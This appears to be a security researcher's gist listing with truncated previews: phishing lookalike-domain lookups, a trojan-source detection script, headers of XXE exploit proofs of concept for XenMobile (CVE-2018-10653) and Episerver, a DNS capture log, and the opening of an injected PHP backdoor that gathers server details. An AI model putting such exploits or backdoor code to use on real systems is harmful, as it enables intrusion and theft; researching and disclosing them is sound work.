jonaslejon

$ zgrep ^postnord 2022-02-07-com.zone.gz|awk '{print $1}'|sort -u
postnord-22.com.
postnord-delivery.com.
postnord-dk-post.com.
postnord-dk.com.
postnord-epostal.com.
postnord-logistics.com.
postnord-nestle.com.
postnord-no.com.
postnord-norway.com.

jonaslejon

<?php
// Fetches a temporary access_token Bearer
// Replace the client_secret and client_id below

$curl = curl_init();

curl_setopt_array($curl, array(
  CURLOPT_URL => 'https://api.wpsec.com/oauth/token',
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => '',

jonaslejon

#/bin/sh
# Usage instructions: sh find.sh php|tr '\n'  '; '
# Then copy and paste the output and execute it 
ext=$1 
C="\u200E \u200F \u202A \u202B \u202C \u202D \u202E \u2066 \u2067 \u2068 \u2069 \u202C" 
for a in $C; do echo find . -type f -name \"*.$ext\" -exec grep -H \$\'$a\' {} \\\; ; done

jonaslejon

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *

jonaslejon

python-usb
python3-usb
mingw-w64
isc-dhcp-server
bridge-utils
libdbus-1-dev
libdbus-glib-1-dev
python3-venv
dirbuster
cmake

jonaslejon

#!/usr/bin/python3
##
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys

jonaslejon

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQINBF5KTFIBEADRvxOAHWw/4xG1BBZvJiA8FXIC/2nu65CMVwyvWVgWkPskRi5A
WcVvBDXUOkIzCliTi8Fq9qEgg9/VT7QjBBVlVXNGHI1Ps4VSQHjHFAjRjl8cfT6k
j4NaOzDQk3G8k0y1+nAI5etDEMdDjCV1A2DQd6w8i15MJnKe2tax7DdGa6jh262s
gByhyBmPlA3mww0qFSl3Fq6hQJPR+S9sLldT87IU/VNx7dbhj3gW+/DTS7CECwoU
3D3VGllo5xnY8upGnKqpJtyF82LElaWhANpOveCQu+fDrD/NiO47aOZd9XMqQaM9
Zavxs9mVWj7GZKFwfXM4EfXz4/MPH90/txODL/t8CDuH+YG3rFec9VyFjpunQHbE
5pvGiIdBhasEc6dbtpEbu2gsNpB1CsOCt85Nijyswlga74gI/RP7m+1xrnhytvxG
cAqFpBt3woJprlX5W8CgxnVt4c5I7pf18+k31/UyBP1v4rkp06YUD/No5Np7BN4+

jonaslejon

## Resolver 1 Bahnhof

21:25:35.771950 IP 212.85.75.170.19496 > 79.99.X.X.53: 49195% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.153508 IP 212.85.75.170.55716 > 79.99.X.X.53: 26680% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:36.527427 IP 212.85.75.170.54433 > 79.99.X.X.53: 59891% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:37.279054 IP 212.85.75.170.21402 > 79.99.X.X.53: 44218% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.039318 IP 212.85.75.170.40338 > 79.99.X.X.53: 12866% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:38.771474 IP 212.85.75.170.25648 > 79.99.X.X.53: 42286% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:39.540317 IP 212.85.75.170.10337 > 79.99.X.X.53: 17760% [1au] A? sfsdsdf.msg.triop.se. (49)
21:25:40.276141 IP 212.85.75.170.57853 > 79.99.X.X.53: 29710% [1au] A? sfsdsdf.msg.triop.se. (49)

jonaslejon

#!/usr/bin/python
##
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
##
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
##
## Written by Jonas Lejon 2017-12-19 <jonas.xxe@triop.se> https://triop.se
## Based on https://gist.github.com/mgeeky/7f45c82e8d3097cbbbb250e37bc68573
## 
## Usage: ./episploit.py <target> [file-to-read]

jonaslejon

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);